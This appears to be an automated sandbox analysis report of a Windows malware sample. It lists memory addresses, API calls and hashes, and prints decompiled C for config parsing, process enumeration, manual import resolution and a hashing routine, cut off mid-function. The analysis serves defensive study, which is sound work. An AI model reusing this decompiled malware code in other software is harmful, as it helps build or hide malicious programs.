0x001c2206
0x001c2209
0x001c220d
0x00000000
0x00000000
0x001c220f
0x001c220d
0x001c2224
0x001c2224
0x001c2226
0x001c222d
0x001c222f
0x001c2235
0x001c223c
0x001c224c
0x001c2244
0x001c2247
0x001c2247
0x001c224f
0x001c224f
0x001c2258
0x001c2258
0x001c2222
0x00000000

APIs

Part of subcall function 001C12D4: RtlAllocateHeap.NTDLL(00000000,63699BC3,00000000), ref: 001C12FF
Part of subcall function 001C12D4: RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 001C1321
Part of subcall function 001C12D4: memset.NTDLL ref: 001C133B
Part of subcall function 001C12D4: CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C1379
Part of subcall function 001C12D4: GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 001C138D
Part of subcall function 001C12D4: CloseHandle.KERNEL32(00000000), ref: 001C13A4
Part of subcall function 001C12D4: StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 001C13B0
Part of subcall function 001C12D4: lstrcat.KERNEL32(?,642E2A5C), ref: 001C13F1
Part of subcall function 001C12D4: FindFirstFileA.KERNELBASE(?,?), ref: 001C1407

Part of subcall function 001C809F: lstrlen.KERNEL32(?,00000000,001CD330,00000001,001C2200,001CD00C,001CD00C,00000000,00000005,00000000,00000000,?,?,?,001C96C1,001C23E9), ref: 001C80A8
Part of subcall function 001C809F: mbstowcs.NTDLL ref: 001C80CF
Part of subcall function 001C809F: memset.NTDLL ref: 001C80E1

HeapFree.KERNEL32(00000000,001CD00C,001CD00C), ref: 001C221C

Memory Dump Source

Source File: 00000006.00000002.2504084087.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000006.00000002.2504076161.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504095624.00000000001CC000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.2504101151.00000000001CD000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504109228.00000000001CF000.00000002.00000001.sdmp Download File

Similarity

API ID: FileHeap$Allocatememset$CloseCreateFindFirstFreeHandleTimelstrcatlstrlenmbstowcs
String ID:
API String ID: 3592152127-0
Opcode ID: db71b10e665e3e15023ca434f3ac89c6bea729bd82e948450a4bf40240415b31
Instruction ID: a87a1840ac37b9bdb2c76bc8cfb69903fdaae2cce16d6cbdb7af36779576406c
Opcode Fuzzy Hash: db71b10e665e3e15023ca434f3ac89c6bea729bd82e948450a4bf40240415b31
Instruction Fuzzy Hash: A0014736200204ABE7006FEADC81F7A76A9EBB5764F50003EFD44D61A0DB75DC829321

Uniqueness

Uniqueness Score: -1.00%

Function 001C1262, Relevance: 1.3, APIs: 1, Instructions: 41
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E001C1262(void** __esi, intOrPtr _a4, unsigned int _a8, void* _a12) {
				signed short _t18;
				void* _t24;
				signed int _t26;
				signed short _t27;

				if(_a4 != 0) {
					_t18 = E001C9318(_a4, _a8, _a12, __esi); // executed
					_t27 = _t18;
				} else {
					_t27 = E001C6BFA(0, 0x80000002, _a8, _a12,  &_a12,  &_a8);
					if(_t27 == 0) {
						_t26 = _a8 >> 1;
						if(_t26 == 0) {
							_t27 = 2;
							HeapFree( *0x1cd238, 0, _a12);
						} else {
							_t24 = _a12;
							 *(_t24 + _t26 * 2 - 2) =  *(_t24 + _t26 * 2 - 2) & _t27;
							 *__esi = _t24;
						}
					}
				}
				return _t27;
			}

0x001c126a
0x001c12bf
0x001c12c4
0x001c126c
0x001c1286
0x001c128a
0x001c128f
0x001c1291
0x001c12a1
0x001c12ad
0x001c1293
0x001c1293
0x001c1296
0x001c129b
0x001c129b
0x001c1291
0x001c128a
0x001c12ca

APIs

HeapFree.KERNEL32(00000000,?,00000000), ref: 001C12AD

Memory Dump Source

Source File: 00000006.00000002.2504084087.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000006.00000002.2504076161.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504095624.00000000001CC000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.2504101151.00000000001CD000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504109228.00000000001CF000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 0b6b5b2c35786565dabb76562d83a2b4e2d18674a2c5bd3e69775d8243122046
Instruction ID: a0e11ac0678fe831872d87c41add6710f8897aca7fd595f715c19af340b4f9ab
Opcode Fuzzy Hash: 0b6b5b2c35786565dabb76562d83a2b4e2d18674a2c5bd3e69775d8243122046
Instruction Fuzzy Hash: 29016D3A140249FBDB228F84CC01FAE3BB6FBA4360F25842CFA198A161D731D821DB50

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 001C4094, Relevance: 9.2, APIs: 6, Instructions: 223
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E001C4094(int* __ecx) {
				int _v8;
				void* _v12;
				void* __esi;
				signed int _t20;
				signed int _t25;
				char* _t31;
				char* _t32;
				char* _t33;
				char* _t34;
				char* _t35;
				void* _t36;
				void* _t37;
				void* _t38;
				intOrPtr _t39;
				void* _t41;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t46;
				intOrPtr _t49;
				signed int _t50;
				signed int _t55;
				void* _t57;
				void* _t58;
				signed int _t60;
				signed int _t64;
				signed int _t68;
				signed int _t72;
				signed int _t76;
				signed int _t80;
				void* _t85;
				intOrPtr _t102;

				_t86 = __ecx;
				_t20 =  *0x1cd278; // 0x63699bc3
				if(E001C8748( &_v12,  &_v8, _t20 ^ 0x8241c5a7) != 0 && _v8 >= 0x90) {
					 *0x1cd2d4 = _v12;
				}
				_t25 =  *0x1cd278; // 0x63699bc3
				if(E001C8748( &_v12,  &_v8, _t25 ^ 0xecd84622) == 0) {
					_push(2);
					_pop(0);
					goto L60;
				} else {
					_t85 = _v12;
					if(_t85 == 0) {
						_t31 = 0;
					} else {
						_t80 =  *0x1cd278; // 0x63699bc3
						_t31 = E001C3F7C(_t86, _t85, _t80 ^ 0x724e87bc);
					}
					if(_t31 != 0) {
						_t86 =  &_v8;
						if(StrToIntExA(_t31, 0,  &_v8) != 0) {
							 *0x1cd240 = _v8;
						}
					}
					if(_t85 == 0) {
						_t32 = 0;
					} else {
						_t76 =  *0x1cd278; // 0x63699bc3
						_t32 = E001C3F7C(_t86, _t85, _t76 ^ 0x2b40cc40);
					}
					if(_t32 != 0) {
						_t86 =  &_v8;
						if(StrToIntExA(_t32, 0,  &_v8) != 0) {
							 *0x1cd244 = _v8;
						}
					}
					if(_t85 == 0) {
						_t33 = 0;
					} else {
						_t72 =  *0x1cd278; // 0x63699bc3
						_t33 = E001C3F7C(_t86, _t85, _t72 ^ 0x3b27c2e6);
					}
					if(_t33 != 0) {
						_t86 =  &_v8;
						if(StrToIntExA(_t33, 0,  &_v8) != 0) {
							 *0x1cd248 = _v8;
						}
					}
					if(_t85 == 0) {
						_t34 = 0;
					} else {
						_t68 =  *0x1cd278; // 0x63699bc3
						_t34 = E001C3F7C(_t86, _t85, _t68 ^ 0x0602e249);
					}
					if(_t34 != 0) {
						_t86 =  &_v8;
						if(StrToIntExA(_t34, 0,  &_v8) != 0) {
							 *0x1cd004 = _v8;
						}
					}
					if(_t85 == 0) {
						_t35 = 0;
					} else {
						_t64 =  *0x1cd278; // 0x63699bc3
						_t35 = E001C3F7C(_t86, _t85, _t64 ^ 0x3603764c);
					}
					if(_t35 != 0) {
						_t86 =  &_v8;
						if(StrToIntExA(_t35, 0,  &_v8) != 0) {
							 *0x1cd02c = _v8;
						}
					}
					if(_t85 == 0) {
						_t36 = 0;
					} else {
						_t60 =  *0x1cd278; // 0x63699bc3
						_t36 = E001C3F7C(_t86, _t85, _t60 ^ 0x2cc1f2fd);
					}
					if(_t36 != 0) {
						_push(_t36);
						_t57 = 0x10;
						_t58 = E001C6ED2(_t57);
						if(_t58 != 0) {
							_push(_t58);
							E001CA5D6();
						}
					}
					if(_t85 == 0) {
						_t37 = 0;
					} else {
						_t55 =  *0x1cd278; // 0x63699bc3
						_t37 = E001C3F7C(_t86, _t85, _t55 ^ 0xb30fc035);
					}
					if(_t37 != 0 && E001C6ED2(0, _t37) != 0) {
						_t102 =  *0x1cd32c; // 0x33497d8
						E001C75E9(_t102 + 4, _t53);
					}
					if(_t85 == 0) {
						_t38 = 0;
					} else {
						_t50 =  *0x1cd278; // 0x63699bc3
						_t38 = E001C3F7C(_t86, _t85, _t50 ^ 0x372ab5b7);
					}
					if(_t38 == 0) {
						L51:
						_t39 =  *0x1cd27c; // 0x317a7d0
						_t18 = _t39 + 0x1ce252; // 0x616d692f
						 *0x1cd2d0 = _t18;
						goto L52;
					} else {
						_t49 = E001C6ED2(0, _t38);
						 *0x1cd2d0 = _t49;
						if(_t49 != 0) {
							L52:
							if(_t85 == 0) {
								_t41 = 0;
							} else {
								_t46 =  *0x1cd278; // 0x63699bc3
								_t41 = E001C3F7C(_t86, _t85, _t46 ^ 0xd8dc5cde);
							}
							if(_t41 == 0) {
								_t42 =  *0x1cd27c; // 0x317a7d0
								_t19 = _t42 + 0x1ce791; // 0x6976612e
								_t43 = _t19;
							} else {
								_t43 = E001C6ED2(0, _t41);
							}
							 *0x1cd340 = _t43;
							HeapFree( *0x1cd238, 0, _t85);
							L60:
							return 0;
						}
						goto L51;
					}
				}
			}

0x001c4094
0x001c4097
0x001c40b7
0x001c40c5
0x001c40c5
0x001c40ca
0x001c40e4
0x001c42e2
0x001c42e4
0x00000000
0x001c40ea
0x001c40ea
0x001c40f1
0x001c4107
0x001c40f3
0x001c40f3
0x001c4100
0x001c4100
0x001c4111
0x001c4113
0x001c411d
0x001c4122
0x001c4122
0x001c411d
0x001c4129
0x001c413f
0x001c412b
0x001c412b
0x001c4138
0x001c4138
0x001c4143
0x001c4145
0x001c414f
0x001c4154
0x001c4154
0x001c414f
0x001c415b
0x001c4171
0x001c415d
0x001c415d
0x001c416a
0x001c416a
0x001c4175
0x001c4177
0x001c4181
0x001c4186
0x001c4186
0x001c4181
0x001c418d
0x001c41a3
0x001c418f
0x001c418f
0x001c419c
0x001c419c
0x001c41a7
0x001c41a9
0x001c41b3
0x001c41b8
0x001c41b8
0x001c41b3
0x001c41bf
0x001c41d5
0x001c41c1
0x001c41c1
0x001c41ce
0x001c41ce
0x001c41d9
0x001c41db
0x001c41e5
0x001c41ea
0x001c41ea
0x001c41e5
0x001c41f1
0x001c4207
0x001c41f3
0x001c41f3
0x001c4200
0x001c4200
0x001c420b
0x001c420d
0x001c4210
0x001c4211
0x001c4218
0x001c421a
0x001c421b
0x001c421b
0x001c4218
0x001c4222
0x001c4238
0x001c4224
0x001c4224
0x001c4231
0x001c4231
0x001c423c
0x001c424a
0x001c4254
0x001c4254
0x001c425b
0x001c4271
0x001c425d
0x001c425d
0x001c426a
0x001c426a
0x001c4275
0x001c4288
0x001c4288
0x001c428d
0x001c4293
0x00000000
0x001c4277
0x001c427a
0x001c4281
0x001c4286
0x001c4298
0x001c429a
0x001c42b0
0x001c429c
0x001c429c
0x001c42a9
0x001c42a9
0x001c42b4
0x001c42c0
0x001c42c5
0x001c42c5
0x001c42b6
0x001c42b9
0x001c42b9
0x001c42d3
0x001c42d8
0x001c42e5
0x001c42e9
0x001c42e9
0x00000000
0x001c4286
0x001c4275

APIs

StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 001C4119
StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 001C414B
StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 001C417D
StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 001C41AF
StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 001C41E1
HeapFree.KERNEL32(00000000,001C23DE,001C23DE), ref: 001C42D8

Memory Dump Source

Source File: 00000006.00000002.2504084087.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000006.00000002.2504076161.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504095624.00000000001CC000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.2504101151.00000000001CD000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504109228.00000000001CF000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 20b79d32623de36d21c0a17556f97e8b8c9cdcd8ed9a3f727ea0525643fa00c7
Instruction ID: b76f9e0e31e9dc07a1040b6ba1fea63d607629124b71e9aca4eaef99fd17366a
Opcode Fuzzy Hash: 20b79d32623de36d21c0a17556f97e8b8c9cdcd8ed9a3f727ea0525643fa00c7
Instruction Fuzzy Hash: BA6174B4A18104ABDB21EBB8EC95F5BBBEDDBB874072A4A2DB401D7515E730EDC08711

Uniqueness

Uniqueness Score: -1.00%

Function 001C757F, Relevance: 6.0, APIs: 4, Instructions: 41
processCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E001C757F() {
				char _v264;
				void* _v300;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t17 = CreateToolhelp32Snapshot(2, 0);
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0x1cd27c; // 0x317a7d0
						_t2 = _t9 + 0x1cee54; // 0x73617661
						_push( &_v264);
						if( *0x1cd0fc() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}

0x001c758a
0x001c7594
0x001c7598
0x001c75a2
0x001c75d3
0x001c75a9
0x001c75ae
0x001c75bb
0x001c75c4
0x001c75db
0x001c75c6
0x001c75ce
0x00000000
0x001c75ce
0x001c75dc
0x001c75dd
0x00000000
0x001c75dd
0x00000000
0x001c75d7
0x001c75e3
0x001c75e8

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 001C758F
Process32First.KERNEL32(00000000,?), ref: 001C75A2
Process32Next.KERNEL32(00000000,?), ref: 001C75CE
CloseHandle.KERNEL32(00000000), ref: 001C75DD

Memory Dump Source

Source File: 00000006.00000002.2504084087.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000006.00000002.2504076161.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504095624.00000000001CC000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.2504101151.00000000001CD000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504109228.00000000001CF000.00000002.00000001.sdmp Download File

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 96f34a83038c6acb5471a67338b88cc1117617031eefdebad04811cb253c73ed
Instruction ID: c2b9297b2709bdf9fca68d6b84242d92166be993ae04fcab7c6d8ec6a24c8fdc
Opcode Fuzzy Hash: 96f34a83038c6acb5471a67338b88cc1117617031eefdebad04811cb253c73ed
Instruction Fuzzy Hash: 68F0F6716051245ACB20A7769D49FEB3BACDBF5310F0100A9F905C2040EB64CD468EA2

Uniqueness

Uniqueness Score: -1.00%

Function 10001850, Relevance: 6.0, APIs: 4, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10001850() {
				void* _t1;
				long _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t8;
				void* _t12;

				_t8 =  *0x10004130;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x1000413c = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 != 5) {
					L4:
					if(_t12 <= 0) {
						_t4 = 0x32;
						return _t4;
					} else {
						goto L5;
					}
				} else {
					if(_t3 > 0) {
						L5:
						 *0x1000412c = _t3;
						_t5 = GetCurrentProcessId();
						 *0x10004128 = _t5;
						 *0x10004130 = _t8;
						_t6 = OpenProcess(0x10047a, 0, _t5);
						 *0x10004124 = _t6;
						if(_t6 == 0) {
							 *0x10004124 =  *0x10004124 | 0xffffffff;
						}
						return 0;
					} else {
						_t12 = _t3 - _t3;
						goto L4;
					}
				}
			}

0x10001851
0x1000185f
0x10001867
0x1000186c
0x100018be
0x100018be
0x1000186e
0x10001876
0x1000187e
0x1000187e
0x100018ba
0x100018bc
0x00000000
0x00000000
0x00000000
0x10001878
0x1000187a
0x10001880
0x10001880
0x10001885
0x10001893
0x10001898
0x1000189e
0x100018a6
0x100018ab
0x100018ad
0x100018ad
0x100018b7
0x1000187c
0x1000187c
0x00000000
0x1000187c
0x1000187a

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,1000164B,766F325B), ref: 1000185F
GetVersion.KERNEL32 ref: 1000186E
GetCurrentProcessId.KERNEL32 ref: 10001885
OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 1000189E

Memory Dump Source

Source File: 00000006.00000002.2505264344.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2505258135.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.2505270801.0000000010005000.00000040.00020000.sdmp Download File

Similarity

API ID: Process$CreateCurrentEventOpenVersion
String ID:
API String ID: 845504543-0
Opcode ID: ad5392e4f8523c6bff8dabd249a7cc4530ce31fe89c4eb97e7685ee26d633860
Instruction ID: 85c0868463d14858f17c42858624fe0a32704ce5df48730f043fd2a385afc03a
Opcode Fuzzy Hash: ad5392e4f8523c6bff8dabd249a7cc4530ce31fe89c4eb97e7685ee26d633860
Instruction Fuzzy Hash: 69F0C2B06492309AF701DF68ADC57C53BE8E7097D2F028215E244D61ECDBB085818B5C

Uniqueness

Uniqueness Score: -1.00%

Function 10001745, Relevance: 3.1, APIs: 2, Instructions: 92
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10001745(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr* _v12;
				_Unknown_base(*)()** _v16;
				signed int _v20;
				signed short _v24;
				struct HINSTANCE__* _v28;
				intOrPtr _t43;
				intOrPtr* _t45;
				intOrPtr _t46;
				struct HINSTANCE__* _t47;
				intOrPtr* _t49;
				intOrPtr _t50;
				signed short _t51;
				_Unknown_base(*)()* _t53;
				CHAR* _t54;
				_Unknown_base(*)()* _t55;
				void* _t58;
				signed int _t59;
				_Unknown_base(*)()* _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				signed int _t68;
				void* _t69;
				CHAR* _t71;
				signed short* _t73;

				_t69 = __edi;
				_v20 = _v20 & 0x00000000;
				_t59 =  *0x1000414c;
				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x1b4cdd98));
				if(_t43 != 0) {
					_t45 = _t43 + __edi;
					_v12 = _t45;
					_t46 =  *((intOrPtr*)(_t45 + 0xc));
					if(_t46 != 0) {
						while(1) {
							_t71 = _t46 + _t69;
							_t47 = LoadLibraryA(_t71);
							_v28 = _t47;
							if(_t47 == 0) {
								break;
							}
							_v24 = _v24 & 0x00000000;
							 *_t71 = _t59 - 0x63699bc3;
							_t49 = _v12;
							_t61 =  *((intOrPtr*)(_t49 + 0x10));
							_t50 =  *_t49;
							if(_t50 != 0) {
								L6:
								_t73 = _t50 + _t69;
								_v16 = _t61 + _t69;
								while(1) {
									_t51 =  *_t73;
									if(_t51 == 0) {
										break;
									}
									if(__eflags < 0) {
										__eflags = _t51 - _t69;
										if(_t51 < _t69) {
											L12:
											_t21 =  &_v8;
											 *_t21 = _v8 & 0x00000000;
											__eflags =  *_t21;
											_v24 =  *_t73 & 0x0000ffff;
										} else {
											_t65 = _a4;
											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
												goto L12;
											} else {
												goto L11;
											}
										}
									} else {
										_t51 = _t51 + _t69;
										L11:
										_v8 = _t51;
									}
									_t53 = _v8;
									__eflags = _t53;
									if(_t53 == 0) {
										_t54 = _v24 & 0x0000ffff;
									} else {
										_t54 = _t53 + 2;
									}
									_t55 = GetProcAddress(_v28, _t54);
									__eflags = _t55;
									if(__eflags == 0) {
										_v20 = _t59 - 0x63699b44;
									} else {
										_t68 = _v8;
										__eflags = _t68;
										if(_t68 != 0) {
											 *_t68 = _t59 - 0x63699bc3;
										}
										 *_v16 = _t55;
										_t58 = 0x725990f8 + _t59 * 4;
										_t73 = _t73 + _t58;
										_t32 =  &_v16;
										 *_t32 = _v16 + _t58;
										__eflags =  *_t32;
										continue;
									}
									goto L23;
								}
							} else {
								_t50 = _t61;
								if(_t61 != 0) {
									goto L6;
								}
							}
							L23:
							_v12 = _v12 + 0x14;
							_t46 =  *((intOrPtr*)(_v12 + 0xc));
							if(_t46 != 0) {
								continue;
							} else {
							}
							L26:
							goto L27;
						}
						_t60 = _t59 + 0x9c9664bb;
						__eflags = _t60;
						_v20 = _t60;
						goto L26;
					}
				}
				L27:
				return _v20;
			}

0x10001745
0x1000174e
0x10001753
0x10001759
0x10001762
0x10001768
0x1000176a
0x1000176d
0x10001772
0x10001779
0x10001779
0x1000177d
0x10001785
0x10001788
0x00000000
0x00000000
0x1000178e
0x10001798
0x1000179a
0x1000179d
0x100017a0
0x100017a4
0x100017ac
0x100017ae
0x100017b1
0x10001819
0x10001819
0x1000181d
0x00000000
0x00000000
0x100017b6
0x100017bc
0x100017be
0x100017d1
0x100017d4
0x100017d4
0x100017d4
0x100017d8
0x100017c0
0x100017c0
0x100017c8
0x100017ca
0x00000000
0x00000000
0x00000000
0x00000000
0x100017ca
0x100017b8
0x100017b8
0x100017cc
0x100017cc
0x100017cc
0x100017db
0x100017de
0x100017e0
0x100017e7
0x100017e2
0x100017e2
0x100017e2
0x100017ef
0x100017f5
0x100017f7
0x10001827
0x100017f9
0x100017f9
0x100017fc
0x100017fe
0x10001806
0x10001806
0x1000180b
0x1000180d
0x10001814
0x10001816
0x10001816
0x10001816
0x00000000
0x10001816
0x00000000
0x100017f7
0x100017a6
0x100017a8
0x100017aa
0x00000000
0x00000000
0x100017aa
0x1000182a
0x1000182a
0x10001831
0x10001836
0x00000000
0x00000000
0x1000183c
0x10001847
0x00000000
0x10001847
0x1000183e
0x1000183e
0x10001844
0x00000000
0x10001844
0x10001772
0x10001848
0x1000184d

APIs

LoadLibraryA.KERNEL32(?), ref: 1000177D
GetProcAddress.KERNEL32(?,00000000), ref: 100017EF

Memory Dump Source

Source File: 00000006.00000002.2505264344.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2505258135.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.2505270801.0000000010005000.00000040.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID:
API String ID: 2574300362-0
Opcode ID: 44a8695f59bde02a6b04981e26f2814c296b5372f7ca6d95004bada70fc4ba09
Instruction ID: c607def5a2bc0e5299d97bb95015c1db0b928527211c0f3006954d548cbcd348
Opcode Fuzzy Hash: 44a8695f59bde02a6b04981e26f2814c296b5372f7ca6d95004bada70fc4ba09
Instruction Fuzzy Hash: 78313675A0420A9FEB55CF99C880AEEB7F8FF04384F258069D805E7248EB70DA41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 001C97F2, Relevance: 1.9, APIs: 1, Instructions: 610
COMMONCrypto

Download Yara Rule

C-Code - Quality: 50%

			E001C97F2(void* __ecx, intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				void _v76;
				intOrPtr* _t226;
				signed int _t229;
				signed int _t231;
				signed int _t233;
				signed int _t235;
				signed int _t237;
				signed int _t239;
				signed int _t241;
				signed int _t243;
				signed int _t245;
				signed int _t247;
				signed int _t249;
				signed int _t251;
				signed int _t253;
				signed int _t255;
				signed int _t257;
				signed int _t259;
				signed int _t274;
				signed int _t337;
				void* _t347;
				signed int _t348;
				signed int _t350;
				signed int _t352;
				signed int _t354;
				signed int _t356;
				signed int _t358;
				signed int _t360;
				signed int _t362;
				signed int _t364;
				signed int _t366;
				signed int _t375;
				signed int _t377;
				signed int _t379;
				signed int _t381;
				signed int _t383;
				intOrPtr* _t399;
				signed int _t407;
				signed int _t409;
				signed int _t411;
				signed int _t413;
				signed int _t415;
				signed int _t417;
				signed int _t419;
				signed int _t421;
				signed int _t423;
				signed int _t425;
				signed int _t427;
				signed int _t429;
				signed int _t437;
				signed int _t439;
				signed int _t441;
				signed int _t443;
				signed int _t445;
				void* _t447;
				signed int _t507;
				signed int _t598;
				signed int _t606;
				signed int _t612;
				signed int _t678;
				signed int* _t681;
				signed int _t682;
				signed int _t684;
				signed int _t689;
				signed int _t691;
				signed int _t696;
				signed int _t698;
				signed int _t717;
				signed int _t719;
				signed int _t721;
				signed int _t723;
				signed int _t725;
				signed int _t727;
				signed int _t733;
				signed int _t739;
				signed int _t741;
				signed int _t743;
				signed int _t745;
				signed int _t747;

				_t226 = _a4;
				_t347 = __ecx + 2;
				_t681 =  &_v76;
				_t447 = 0x10;
				do {
					_t274 =  *(_t347 - 1) & 0x000000ff;
					_t347 = _t347 + 4;
					 *_t681 = (0 << 0x00000008 | _t274) << 0x00000008 |  *(_t347 - 6) & 0x000000ff;
					_t681 =  &(_t681[1]);
					_t447 = _t447 - 1;
				} while (_t447 != 0);
				_t6 = _t226 + 4; // 0x14eb3fc3
				_t682 =  *_t6;
				_t7 = _t226 + 8; // 0x8d08458b
				_t407 =  *_t7;
				_t8 = _t226 + 0xc; // 0x56c1184c
				_t348 =  *_t8;
				asm("rol eax, 0x7");
				_t229 = ( !_t682 & _t348 | _t407 & _t682) + _v76 +  *_t226 - 0x28955b88 + _t682;
				asm("rol ecx, 0xc");
				_t350 = ( !_t229 & _t407 | _t682 & _t229) + _v72 + _t348 - 0x173848aa + _t229;
				asm("ror edx, 0xf");
				_t409 = ( !_t350 & _t682 | _t350 & _t229) + _v68 + _t407 + 0x242070db + _t350;
				asm("ror esi, 0xa");
				_t684 = ( !_t409 & _t229 | _t350 & _t409) + _v64 + _t682 - 0x3e423112 + _t409;
				_v8 = _t684;
				_t689 = _v8;
				asm("rol eax, 0x7");
				_t231 = ( !_t684 & _t350 | _t409 & _v8) + _v60 + _t229 - 0xa83f051 + _t689;
				asm("rol ecx, 0xc");
				_t352 = ( !_t231 & _t409 | _t689 & _t231) + _v56 + _t350 + 0x4787c62a + _t231;
				asm("ror edx, 0xf");
				_t411 = ( !_t352 & _t689 | _t352 & _t231) + _v52 + _t409 - 0x57cfb9ed + _t352;
				asm("ror esi, 0xa");
				_t691 = ( !_t411 & _t231 | _t352 & _t411) + _v48 + _t689 - 0x2b96aff + _t411;
				_v8 = _t691;
				_t696 = _v8;
				asm("rol eax, 0x7");
				_t233 = ( !_t691 & _t352 | _t411 & _v8) + _v44 + _t231 + 0x698098d8 + _t696;
				asm("rol ecx, 0xc");
				_t354 = ( !_t233 & _t411 | _t696 & _t233) + _v40 + _t352 - 0x74bb0851 + _t233;
				asm("ror edx, 0xf");
				_t413 = ( !_t354 & _t696 | _t354 & _t233) + _v36 + _t411 - 0xa44f + _t354;
				asm("ror esi, 0xa");
				_t698 = ( !_t413 & _t233 | _t354 & _t413) + _v32 + _t696 - 0x76a32842 + _t413;
				_v8 = _t698;
				asm("rol eax, 0x7");
				_t235 = ( !_t698 & _t354 | _t413 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
				asm("rol ecx, 0xc");
				_t356 = ( !_t235 & _t413 | _v8 & _t235) + _v24 + _t354 - 0x2678e6d + _t235;
				_t507 =  !_t356;
				asm("ror edx, 0xf");
				_t415 = (_t507 & _v8 | _t356 & _t235) + _v20 + _t413 - 0x5986bc72 + _t356;
				_v12 = _t415;
				_v12 =  !_v12;
				asm("ror esi, 0xa");
				_t717 = (_v12 & _t235 | _t356 & _t415) + _v16 + _v8 + 0x49b40821 + _t415;
				asm("rol eax, 0x5");
				_t237 = (_t507 & _t415 | _t356 & _t717) + _v72 + _t235 - 0x9e1da9e + _t717;
				asm("rol ecx, 0x9");
				_t358 = (_v12 & _t717 | _t415 & _t237) + _v52 + _t356 - 0x3fbf4cc0 + _t237;
				asm("rol edx, 0xe");
				_t417 = ( !_t717 & _t237 | _t358 & _t717) + _v32 + _t415 + 0x265e5a51 + _t358;
				asm("ror esi, 0xc");
				_t719 = ( !_t237 & _t358 | _t417 & _t237) + _v76 + _t717 - 0x16493856 + _t417;
				asm("rol eax, 0x5");
				_t239 = ( !_t358 & _t417 | _t358 & _t719) + _v56 + _t237 - 0x29d0efa3 + _t719;
				asm("rol ecx, 0x9");
				_t360 = ( !_t417 & _t719 | _t417 & _t239) + _v36 + _t358 + 0x2441453 + _t239;
				asm("rol edx, 0xe");
				_t419 = ( !_t719 & _t239 | _t360 & _t719) + _v16 + _t417 - 0x275e197f + _t360;
				asm("ror esi, 0xc");
				_t721 = ( !_t239 & _t360 | _t419 & _t239) + _v60 + _t719 - 0x182c0438 + _t419;
				asm("rol eax, 0x5");
				_t241 = ( !_t360 & _t419 | _t360 & _t721) + _v40 + _t239 + 0x21e1cde6 + _t721;
				asm("rol ecx, 0x9");
				_t362 = ( !_t419 & _t721 | _t419 & _t241) + _v20 + _t360 - 0x3cc8f82a + _t241;
